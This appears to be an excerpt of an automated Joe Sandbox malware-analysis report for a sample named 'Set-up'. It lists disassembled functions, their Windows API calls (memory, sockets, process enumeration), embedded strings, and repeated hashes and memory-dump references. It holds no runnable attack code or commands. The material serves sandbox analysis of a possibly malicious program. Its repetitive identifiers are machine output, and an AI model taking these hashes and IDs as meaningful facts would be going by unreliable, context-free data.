                                    • Opcode Fuzzy Hash: 80364f55b4e81cf1b66d0e98cf9a7d6dd5ad9156cc3665f75c942d414759f299
                                    • Instruction Fuzzy Hash: DD21D1B5A043156BD730AF15EC46F17BB9CEB85B58F18092CFC1893252E771E90097A2
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID: name$processes
                                    • API String ID: 420147892-3597786721
                                    • Opcode ID: 851d6bb682f419e9d5fe563e34caf171397bc8e287b2701e0b08bc75d5cefc11
                                    • Instruction ID: f84ab6f3b144ad167f926e5f77452995e7d930eb96ad83ca1ce2c8e6909810bd
                                    • Opcode Fuzzy Hash: 851d6bb682f419e9d5fe563e34caf171397bc8e287b2701e0b08bc75d5cefc11
                                    • Instruction Fuzzy Hash: 9D31A3B49087059FCB44FFB8C58469EBBF4AF54344F00896DD8A8A7240E7349A44CF92
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00C9D739,00000001,000000D9,system_win32.c), ref: 00C87263
                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00C87287
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C8728F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_func_errnofflush
                                    • String ID: LIMIT %s:%d %s reached memlimit$MEM %s:%d malloc(%zu) = %p$malloc
                                    • API String ID: 4185500129-2082484552
                                    • Opcode ID: 9b5df7b101ae2568e4867365ed695614df2f59fc4f4bd1db3dcba62d29f7e023
                                    • Instruction ID: 0ccc11313af1baa2656784e0df472181587ca42b62ccef0b538665bd4ec87ecd
                                    • Opcode Fuzzy Hash: 9b5df7b101ae2568e4867365ed695614df2f59fc4f4bd1db3dcba62d29f7e023
                                    • Instruction Fuzzy Hash: 8B11E6F5A04349ABD620EF55EC8AF1777ACEB80B48F15052CFC6482241FB31E9148771
                                    APIs
                                    • WSAStartup.WS2_32(00000202), ref: 00C9D65A
                                      • Part of subcall function 00C9D690: GetModuleHandleA.KERNEL32(kernel32,00000000,?,?,?,00C9D5FA,iphlpapi.dll), ref: 00C9D699
                                      • Part of subcall function 00C9D690: GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 00C9D6B5
                                      • Part of subcall function 00C9D690: strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,011FBEB4,?,?,00C9D5FA,iphlpapi.dll), ref: 00C9D6C3
                                    • GetProcAddress.KERNEL32(00000000,if_nametoindex), ref: 00C9D60C
                                    • QueryPerformanceFrequency.KERNEL32(0134B070), ref: 00C9D643
                                    • WSACleanup.WS2_32 ref: 00C9D67C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: AddressProc$CleanupFrequencyHandleModulePerformanceQueryStartupstrpbrk
                                    • String ID: if_nametoindex$iphlpapi.dll
                                    • API String ID: 3452087986-3097795196
                                    • Opcode ID: 9c2920f8ecad5ff4c7fc95327f25053ddac07ab6057b52fb8ac44e1ce7e9874a
                                    • Instruction ID: cde57fb3fe1e6bce9bd6208f8945cf28540a6d36649a6c47d3afd805d805a868
                                    • Opcode Fuzzy Hash: 9c2920f8ecad5ff4c7fc95327f25053ddac07ab6057b52fb8ac44e1ce7e9874a
                                    • Instruction Fuzzy Hash: E50147B4A003404BEB206F3CE90F36576A86B51304F48092CF879D119BFB38C288C352
                                    APIs
                                    • htonl.WS2_32(7F000001), ref: 00D34A21
                                    • gethostname.WS2_32(00000000,00000040), ref: 00D34AA4
                                    • WSAGetLastError.WS2_32 ref: 00D34AB3
                                    • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002E), ref: 00D34B3F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: ErrorLastgethostnamehtonlstrchr
                                    • String ID:
                                    • API String ID: 655544046-0
                                    • Opcode ID: 7606994889f32bb3149ad9f8d137e27c074f9bec932530826146f6de14dcd2e5
                                    • Instruction ID: e2f1676362069da979c0356d5979a0ccdae32291a6fee3eb2a99ff62a4095ae5
                                    • Opcode Fuzzy Hash: 7606994889f32bb3149ad9f8d137e27c074f9bec932530826146f6de14dcd2e5
                                    • Instruction Fuzzy Hash: 93519EB16047008BE7309F69DD49723B6E8EF45319F18093DE99A866D1E779F884CB32
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00C82690), ref: 011562CB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 01156337
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0115633C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _errnofreemalloc
                                    • String ID:
                                    • API String ID: 1571115353-0
                                    • Opcode ID: 56382f2d5ded4cc71fc9da181e118012166866603733834567a189bf61e2665c
                                    • Instruction ID: 23405769e5e3789b6c509bf4f5ab864b3e331aa3db4a69904227821f495a1a9e
                                    • Opcode Fuzzy Hash: 56382f2d5ded4cc71fc9da181e118012166866603733834567a189bf61e2665c
                                    • Instruction Fuzzy Hash: 9701C9B0504301CBEB89AF69C58431A7AE5AF50304F948469CC988F38ADB79C454CBE2
                                    APIs
                                    • AcquireSRWLockExclusive.KERNEL32(0134B044,00C8208F), ref: 00C83AB5
                                    • ReleaseSRWLockExclusive.KERNEL32(0134B044,0134B044,00C8208F), ref: 00C83AD0
                                    • ReleaseSRWLockExclusive.KERNEL32(0134B044), ref: 00C83B02
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: ExclusiveLock$Release$Acquire
                                    • String ID:
                                    • API String ID: 1021914862-0
                                    • Opcode ID: 6403a4effe905ca7df4fd7d377761d48bc8502ab0b09228b77260f61f2e3c2b6
                                    • Instruction ID: 86de2eb842418c6963f240996eced72db0a21f942eccde8ae7f698aee03ca50c
                                    • Opcode Fuzzy Hash: 6403a4effe905ca7df4fd7d377761d48bc8502ab0b09228b77260f61f2e3c2b6
                                    • Instruction Fuzzy Hash: D2E08C28A002438FEB317BA5A80364DA2987B20B4EF844428A165A025DEF3CF9046722
                                    APIs
                                    • closesocket.WS2_32(?), ref: 00C878BB
                                      • Part of subcall function 00C872A0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,000003FF), ref: 00C872F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: closesocketfwrite
                                    • String ID: FD %s:%d sclose(%d)
                                    • API String ID: 1967222983-3116021458
                                    • Opcode ID: 01c045cff7c121d60343df63b0804b00eb6ac593c604f79043ea3d41d417d995
                                    • Instruction ID: 25b3530ef8e3151e6b32b4897f8be6aedeba79d22a44023607b3992037394038
                                    • Opcode Fuzzy Hash: 01c045cff7c121d60343df63b0804b00eb6ac593c604f79043ea3d41d417d995
                                    • Instruction Fuzzy Hash: C2D05E32A092606BC6206A59BC48C5BBBA8DEC6F61B09096DF95077204E220DC0197E2
                                    APIs
                                    • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00D372FE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _stricmp
                                    • String ID:
                                    • API String ID: 2884411883-0
                                    • Opcode ID: 3eaaf8f48c2090f33216c2d3cdc4b471262ab83889dd785a8b0ff9e63d67d911
                                    • Instruction ID: c9e5fae3fd37da10fcf675f27af75c2f507d5d50ed4338112115f25c193fe58f
                                    • Opcode Fuzzy Hash: 3eaaf8f48c2090f33216c2d3cdc4b471262ab83889dd785a8b0ff9e63d67d911
                                    • Instruction Fuzzy Hash: 60C185F6908700ABEB20AF14DC86B6B77A9EF44308F480468FD8957252E771ED54D7B2
                                    APIs
                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,0115B74F), ref: 0115B6B9
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,0115B74F), ref: 0115B6DC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _errnorealloc
                                    • String ID:
                                    • API String ID: 3650671883-0
                                    • Opcode ID: 29c12d94e65f4e03f78a35d363a7cd252d5dea5636832e5bb0c63ad37cb340b7
                                    • Instruction ID: 4ecf8d128146dcc9b4b03dce6f68debd08e00774ada1d029ff26be913950c32d
                                    • Opcode Fuzzy Hash: 29c12d94e65f4e03f78a35d363a7cd252d5dea5636832e5bb0c63ad37cb340b7
                                    • Instruction Fuzzy Hash: D3F09071508512CFCB549F2CC880059B7E6BF05324B6A8756EC34CB2E5E730D881CBB6
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,00DFD471,00000050,crypto/bio/bio_lib.c,00000053,?,?,?,00DFD52B,00000000,00C81A70,00E048ED,0125909C), ref: 00E5CA8C
                                    • memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000000,00C81A70), ref: 00E5CA9E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: mallocmemset
                                    • String ID:
                                    • API String ID: 2882185209-0
                                    • Opcode ID: 78dae41076160ff7330b773045edf66e3d4a58d0c239a779a9c7b0efeceaf005
                                    • Instruction ID: 3396cce10ccb2ae2b9ef475eac50f0658b5cf805237c60e42721b027b7a9e0f0
                                    • Opcode Fuzzy Hash: 78dae41076160ff7330b773045edf66e3d4a58d0c239a779a9c7b0efeceaf005
                                    • Instruction Fuzzy Hash: 7101D2D6B053452BE631E5756C85B5B2F8C9B9171AF282835FD41F6283E641D84C82A2
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,01156431), ref: 01156AB3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 4fff40c35b4763ceba2ae390be91be56c12f2d9607a51bca9d4d3afd4392a104
                                    • Instruction ID: a924a90d906e661a74eddf5602a5ba6c21feaa62cefeb43900765fc2dcf9f328
                                    • Opcode Fuzzy Hash: 4fff40c35b4763ceba2ae390be91be56c12f2d9607a51bca9d4d3afd4392a104
                                    • Instruction Fuzzy Hash: 9501A8B4604701CBEB99AF7DC4C452A77E0BF55204F85885ADCA5CB346D774D890CB92
                                    APIs
                                    • getsockname.WS2_32(?,?,00000080), ref: 00D4AFD0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
